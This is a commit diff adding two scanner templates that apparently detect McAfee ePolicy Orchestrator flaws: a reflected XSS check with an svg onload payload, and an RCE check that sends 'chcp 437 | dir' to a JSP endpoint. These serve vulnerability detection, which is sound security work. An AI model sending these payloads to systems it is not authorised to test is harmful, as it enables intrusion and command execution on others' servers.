commit
f83258f4a4
|
@ -0,0 +1,41 @@
|
||||||
|
id: cve-2020-7318
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: McAfee ePolicy Orchestrator Reflected XSS
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross-Site Scripting vulnerability in McAfee ePolicy Orchestrator (ePO)
|
||||||
|
prior to 5.10.9 Update 9 allows administrators to inject arbitrary web
|
||||||
|
script or HTML via multiple parameters where the administrator's entries
|
||||||
|
were not correctly sanitized.
|
||||||
|
|
||||||
|
References:
|
||||||
|
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- payloads:
|
||||||
|
port:
|
||||||
|
- "80"
|
||||||
|
- "443"
|
||||||
|
- "8443"
|
||||||
|
raw:
|
||||||
|
- |
|
||||||
|
GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
|
||||||
|
Host: {{Hostname}}:§port§
|
||||||
|
Connection: close
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Policy Name"
|
||||||
|
- "'\"><svg/onload=alert(document.domain)>"
|
||||||
|
condition: and
|
||||||
|
part: body
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: mcafee-epo-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: McAfee ePolicy Orchestrator RCE
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
A ZipSlip vulnerability in McAfee ePolicy Orchestrator (ePO)
|
||||||
|
is a type of Path Traversal occurring when archives are unpacked
|
||||||
|
if the names of the packed files are not properly sanitized.
|
||||||
|
An attacker can create archives with files containing “../” in their names,
|
||||||
|
making it possible to upload arbitrary files
|
||||||
|
to arbitrary directories or overwrite existing ones during archive extraction.
|
||||||
|
|
||||||
|
References:
|
||||||
|
- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
part: header
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "Volume (in drive [A-Z]|Serial Number) is"
|
||||||
|
part: body
|
Loading…
Reference in New Issue